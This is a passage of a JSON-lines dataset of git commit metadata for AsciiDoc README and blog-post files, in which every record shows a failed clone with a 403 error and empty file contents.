2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"830aca6af6eceab9d8296b99383f4b00d4ff6b6e","subject":"Update 2016-08-09-xiaocase2.adoc","message":"Update 2016-08-09-xiaocase2.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-xiaocase2.adoc","new_file":"_posts\/2016-08-09-xiaocase2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b8fdba91017517909b4007fc8b14c6e043b7370","subject":"Publish 2096-1-1-Puzzle-5-Admission-e-ticket.adoc","message":"Publish 2096-1-1-Puzzle-5-Admission-e-ticket.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2096-1-1-Puzzle-5-Admission-e-ticket.adoc","new_file":"2096-1-1-Puzzle-5-Admission-e-ticket.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a3e3262a01fe39262d7f6481cf4dd8d3bb513bf","subject":"changed usage styling in readme","message":"changed usage styling in readme\n","repos":"soosc\/metalsmith-publishon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soosc\/metalsmith-publishon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67958bfb33910025bbaf6c54f7663c53b00b5607","subject":"More polish","message":"More polish\n","repos":"wangcan2014\/tut-bookmarks,Sheparzo\/tut-bookmarks,razordaze\/tut-bookmarks,DongsunPark\/bookmarks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DongsunPark\/bookmarks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8f1727374011be309e982fc4757db34be2fb2ea","subject":"Updated README credit URL","message":"Updated README credit URL\n\nNecessary to pick up new author profile URL.\n","repos":"bkuhlmann\/git-cop,bkuhlmann\/git-cop","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/git-cop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3ec4b942f2fe06da878d66ac9e6e17c644ad56f","subject":"Python note: Calling easy_install as module","message":"Python note: Calling easy_install as module\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c6596e5d6d59c3896d6dd080b76f4d89c5ba2647","subject":"Updated documentation","message":"Updated documentation\n","repos":"RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e28a10a2dbeb1a1b7d8d7b0441147ca7c6b3d5a2","subject":"Updated README","message":"Updated README\n","repos":"resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,drmaas\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1465e65ffe7d6d47bfabb9ea773b68c915cb807b","subject":"Update README.doc with correct endpoints","message":"Update README.doc with correct endpoints\n","repos":"lucasponce\/hawkular-alerts,tsegismont\/hawkular-alerts,lucasponce\/hawkular-alerts,hawkular\/hawkular-alerts,jshaughn\/hawkular-alerts,tsegismont\/hawkular-alerts,jpkrohling\/hawkular-alerts,hawkular\/hawkular-alerts,jpkrohling\/hawkular-alerts,hawkular\/hawkular-alerts,hawkular\/hawkular-alerts,lucasponce\/hawkular-alerts,jshaughn\/hawkular-alerts,lucasponce\/hawkular-alerts,jsanda\/hawkular-alerts,jsanda\/hawkular-alerts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lucasponce\/hawkular-alerts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c19f496ebc45d9c8ef2c3e2bd0dce52ab76db80","subject":"gardeing","message":"gardeing\n","repos":"Kronos-Integration\/kronos-service-manager","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-service-manager.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"47546f6d0c56da7ed642afe52c1b46e6848e4970","subject":"Fix formatting","message":"Fix formatting\n\nSome of the text in the \"Using Git\" section was misformatted because of incorrect use of quotes.","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"14e7cbe05d5453c3c9bb5fdc78d7558fee6df011","subject":"Added license headers","message":"Added license headers\n","repos":"mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,resilience4j\/resilience4j,drmaas\/resilience4j,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1e7cc7d255c4c3640f01450c60ad25f8fd1b93a","subject":"Update Readme, parametrize more strings, remove redundant stuff","message":"Update Readme, parametrize more strings, remove redundant stuff\n","repos":"jirutka\/change-password,zhangwei0181\/ldap-passwd-webui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/change-password.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35244e57d5e4ee3caa314d5ef22e92f445910b99","subject":"Update README","message":"Update README\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-test,sdavids\/sdavids-commons-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15eb0957ef2550be377b9425476ea0041351989d","subject":"Add a README with some basic information.","message":"Add a README with some basic information.\n","repos":"jamezp\/wildfly-arquillian","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jamezp\/wildfly-arquillian.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f263ceed153137e9377a514adb0afb8c97b00be8","subject":"Fixes in Readme","message":"Fixes in Readme\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7be61255129d3d1d729df91c8bd6055eab0ee9be","subject":"README: add WP:RFC link","message":"README: add WP:RFC link\n","repos":"beni55\/vim-rfc,andreaswachowski\/vim-rfc,mhinz\/vim-rfc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mhinz\/vim-rfc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed5261636883c69b1c7d988f5360bb74379b0a50","subject":"Python note: One way to control relative import","message":"Python note: One way to control relative import\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"6f2ba4e2122166e1d069b6250934c1ec4a2e714a","subject":"Added README","message":"Added README\n","repos":"hierynomus\/asn-one","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hierynomus\/asn-one.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca54013bf117f48fc234ebb3dd0e3d07e6cd060c","subject":"docker command example","message":"docker command example\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e081b6f9fc68ec15f302a33f4f774fe62a8c879","subject":"Add README","message":"Add README\n","repos":"l1048576\/fbx_direct","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/l1048576\/fbx_direct.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"86b365a0fe1182aaafe7dd0b8d91013403fb21da","subject":"README: \u201csimple\u201d \u2192 \u201cless complex\u201d","message":"README: \u201csimple\u201d \u2192 \u201cless complex\u201d\n\nSome people complain that vanilla maps aren\u2019t necessarily simple.\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"3dfb15149ebff3c8fc56031218857e2b04cc9f62","subject":"First version of the README","message":"First version of the README\n","repos":"trebuh\/online-server-watcher","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trebuh\/online-server-watcher.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12fa89672458de9fc4dc4f712dd62caa1d2582ce","subject":"chore: add badges","message":"chore: add badges\n","repos":"gravitee-io\/gravitee-policy-authentication","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-authentication.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bc9d992b513f49d095cad8ac04ead01d63928da","subject":"Add a draft of a README","message":"Add a draft of a README\n\n(yes, _still_ recuperating from the flu)\n","repos":"cyChop\/beverages-js,cyChop\/beverages-js,cyChop\/teas-js,cyChop\/beverages-js,cyChop\/teas-js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cyChop\/beverages-js.git\/': The requested URL returned error: 403\n","license":"unknown","lang":"AsciiDoc"} {"commit":"37ccc80f18a6e3378fd1eb63b7dec6481c946831","subject":"Added links","message":"Added links\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"086a10357c6f885f657d07855cb90c838ae5f1b9","subject":"updating readme","message":"updating readme\n","repos":"bbyers-pivotal\/gnomes-demo,reshmik\/gnomes-demo,viniciusccarvalho\/gnomes-demo,viniciusccarvalho\/gnomes-demo,agallego-pivotal\/gnomes-demo,reshmik\/gnomes-demo,bbyers-pivotal\/gnomes-demo,agallego-pivotal\/gnomes-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bbyers-pivotal\/gnomes-demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31aab41d33a469c0273b96adc3005c1efa3c4505","subject":"Add readme","message":"Add readme\n\n[skip ci]\n","repos":"lassik\/extract,lassik\/extract","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"8c84be5f9217a58e60abea9adfeae171df2ebdfc","subject":"Updated documentation","message":"Updated documentation","repos":"javaslang\/javaslang-circuitbreaker,drmaas\/resilience4j,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,storozhukBM\/javaslang-circuitbreaker,goldobin\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,mehtabsinghmann\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a496d80596b757251c64a15f518c9e900818aa6","subject":"Add README.adoc.","message":"Add README.adoc.\n","repos":"mitclap\/android,mitclap\/android","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mitclap\/android.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d0cdf4ce7de32a1d2507311fe26f9720375716ce","subject":"Added coveralls badge to readme","message":"Added coveralls badge to readme","repos":"oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c06514bb95439d757b74267278de150f4d97b469","subject":"Updated documentation","message":"Updated documentation","repos":"goldobin\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bad02578bfc43a55f78577263da00cdb6662011d","subject":"add diagram overview","message":"add diagram overview\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15b6c5af434a2de1348fa94ec58997f5d0fe9ff5","subject":"Document the dynamic DNS update with dedicated LB","message":"Document the dynamic DNS update with dedicated LB\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fb10b882e1386b5a17752dab6bf4a1e0ad26499","subject":"Added readme. Added Gitter badge. Signed-off-by:Ondrej Mihalyi <ondrej.mihalyi@gmail.com>","message":"Added readme. Added Gitter badge.\nSigned-off-by:Ondrej Mihalyi <0548979e2ac15cccb3e6ca41d0de8b4627382aff@gmail.com>","repos":"jbosstm\/microprofile-sandbox","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosstm\/microprofile-sandbox.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7bd68cee47a2b01e85416c08b35220adc290a67","subject":"minor fixes for README.adoc","message":"minor fixes for README.adoc\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c2253ae7b747b4deaff8f8bb8fcdfa2e2f6f788","subject":"Create README.adoc","message":"Create README.adoc","repos":"fifilyu\/openssl-cplueplus-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fifilyu\/openssl-cplueplus-demo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ac142b8b2cd873b865812e8c89732ddd5e5dedd","subject":"Update 2016-05-13-Engineer-Career-Path.adoc","message":"Update 2016-05-13-Engineer-Career-Path.adoc\n\nAdd Image","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34e4bf1873bc495f50c0fa940c9dee7a05e877f2","subject":"Update 2017-05-31-Naming-Conventions.adoc","message":"Update 2017-05-31-Naming-Conventions.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e0a76fdb22cfe2e629eac70838aa4ff559a3451","subject":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","message":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6314995119072ef988e15dc915b0eac58533b063","subject":"Add tutorial","message":"Add tutorial\n\nResolves #163.\n","repos":"gdamore\/tcell,gdamore\/tcell","old_file":"TUTORIAL.adoc","new_file":"TUTORIAL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gdamore\/tcell.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b010b3907a7ac0da4c99343d51c71f5fb5a8602","subject":"y2b create post The YouTube Subscriber Counter","message":"y2b create post The YouTube Subscriber Counter","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-29-The-YouTube-Subscriber-Counter.adoc","new_file":"_posts\/2017-03-29-The-YouTube-Subscriber-Counter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"552725c79c20cc927ce711ff1bc86a39a116696f","subject":"Update 2017-07-07-Thanks-Kurt-for-the-rememories.adoc","message":"Update 2017-07-07-Thanks-Kurt-for-the-rememories.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-07-07-Thanks-Kurt-for-the-rememories.adoc","new_file":"_posts\/2017-07-07-Thanks-Kurt-for-the-rememories.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9bb947375623298fe8fd377798a69f3573c2034","subject":"Initial usage notes","message":"Initial usage notes\n","repos":"ECP-CANDLE\/Database,ECP-CANDLE\/Database","old_file":"plots\/README.adoc","new_file":"plots\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Database.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"330016ca68a288191780f7ba02a1ec5ec42f5612","subject":"Update 2015-05-17-Uber-das-Vergessen.adoc","message":"Update 2015-05-17-Uber-das-Vergessen.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-17-Uber-das-Vergessen.adoc","new_file":"_posts\/2015-05-17-Uber-das-Vergessen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6e158b02f27c766102178af9a460e24e2d29298","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be63c1c6df800c040b9d54902b3140bd3085a32c","subject":"Update 2015-05-09-BurpSentinel-Payloads.adoc","message":"Update 2015-05-09-BurpSentinel-Payloads.adoc","repos":"dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io","old_file":"_posts\/2015-05-09-BurpSentinel-Payloads.adoc","new_file":"_posts\/2015-05-09-BurpSentinel-Payloads.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dobin\/dobin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8195846c06dd3b3f0983f78b4de20320bf9075bc","subject":"Update 2015-06-05-Ma-journee-au-web2day.adoc","message":"Update 2015-06-05-Ma-journee-au-web2day.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-05-Ma-journee-au-web2day.adoc","new_file":"_posts\/2015-06-05-Ma-journee-au-web2day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"604a9e34e2dc8d5f4025496f316e345e1b4e1c12","subject":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","message":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"546bc834cb83ac41ec83b9e7fddcd56fda8c2ce3","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f83174042ba7ee95ba5df197aa9b8d49b6492c59","subject":"CL note: read binary","message":"CL note: read binary\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"127764faa6d889d93a2d8efdfde75312cc290366","subject":"Grafana doc update: (#281)","message":"Grafana doc update: (#281)\n\n* Grafana doc update:\r\n\r\n- fix wrong path for plugin installation\r\n- add details about access mode\r\n- add details about tenants\r\n\r\n* Use brand names Hawkular Metrics \/ Services\r\n","repos":"objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9f8d5d76aa76fa8cb8fb0583301b974964facd8","subject":"Update 2016-10-05-15072015-Moteur.adoc","message":"Update 